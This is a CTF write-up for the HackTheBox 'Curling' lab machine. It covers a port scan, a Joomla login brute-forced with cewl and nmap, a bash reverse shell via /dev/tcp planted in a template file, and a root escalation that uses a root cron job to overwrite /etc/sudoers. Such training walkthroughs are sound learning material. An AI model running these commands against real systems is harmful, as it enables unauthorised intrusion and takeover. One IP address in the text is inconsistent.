Post

HackTheBox Curling Writeup

Explore the fundamentals of cybersecurity with the Curling Capture The Flag (CTF) challenge, an easy-level experience designed to be accessible and ideal for beginners. This straightforward CTF write-up offers clear insights into essential Linux concepts.

Add Hosts

Edit the /etc/hosts file and add the following entries:

1
10.10.10.150 curling.htb

This ensures that your system can resolve the domain names curling.htb to the correct IP address 10.10.11.242.

Script to add hosts automatically

1
2
3
ip="10.10.10.150"
domain="curling.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV curling.htb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-13 15:58 CEST
Nmap scan report for curling.htb (10.10.10.150)
Host is up (0.050s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Determine Joomla Version

Visit the following URL to check the Joomla version:

1
http://curling.htb/administrator/manifests/files/joomla.xml

Brute Force

While inspecting the source of index.php, you find the following comment:
<!-- secret.txt -->

Navigate to http://curling.htb/secret.txt to find a Base64-encoded secret.

Decode it to get the password:

1
echo "$(curl -s http://curling.htb/secret.txt | base64 -d)" > password

Brute-Forcing Joomla Login

Use Nmap’s http-joomla-brute script to brute-force the login:

1
2
3
4
cewl curling.htb | sed '1d' > cewl.out
echo "$(curl -s http://curling.htb/secret.txt | base64 -d)" > password
nmap -p 80 --script http-joomla-brute --script-args userdb=cewl.out,passdb=password,brute.mode=user,brute.firstonly=true curling.htb
rm -rf cewl.out password

This yields the credentials: Floris:Curling2018!

You can now log in at:

1
http://curling.htb/administrator/index.php

Obtaining a Reverse Shell

Go to Extensions > Templates or visit this direct link.

Run a listener and prepare the payload:

1
2
3
attackerip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
echo "Add in the index.php -> system('bash -c \"bash -i >& /dev/tcp/$attackerip/9001 0>&1\"');"
nc -lvnp 9001

Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

1
python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

1
stty size; stty raw -echo; fg

As the last step, set the terminal environment:

1
export TERM=xterm;

Extracting Password Backup

To extract and analyze files:

1
2
3
4
5
6
7
8
9
cp /home/floris/password_backup /dev/shm
cd /dev/shm
cat password_backup
xxd -r password_backup > 1
file 1; bzcat 1 > 2
file 2; zcat 2 > 3
file 3; bzcat 3 > 4
file 4; tar -xvf 4
cat password.txt

This yields the credentials: 5d<wdCbdZu)|hChXll.

Logging in

To log in via SSH:

1
2
3
4
5
ssh floris@curling.htb
cat user.txt
cd admin-area
echo -e 'url = "file:///root/root.txt"' > input
watch -n 1 cat report

Note: Wait approximately one minute for the flag to appear.

Info

  • List Cron Jobs: /var/spool/cron/crontabs/root
1
2
3
cd /home/floris/admin-area
echo 'url = "file://<path>"' > input
watch -n 1 cat report

Obtaining a Proper Root Shell

Follow the above steps to escalate privileges and gain a root shell.

1
2
3
4
cd /home/floris/admin-area
echo -e "%sudo ALL=(ALL:ALL) ALL\nfloris ALL=(ALL:ALL) ALL" > /tmp/sudoers
echo -e "url = \"file:///tmp/sudoers\"\noutput = \"/etc/sudoers\"" > input
watch -n 1 cat report

Switch to root user

1
sudo su -
This post is licensed under CC BY 4.0 by the author.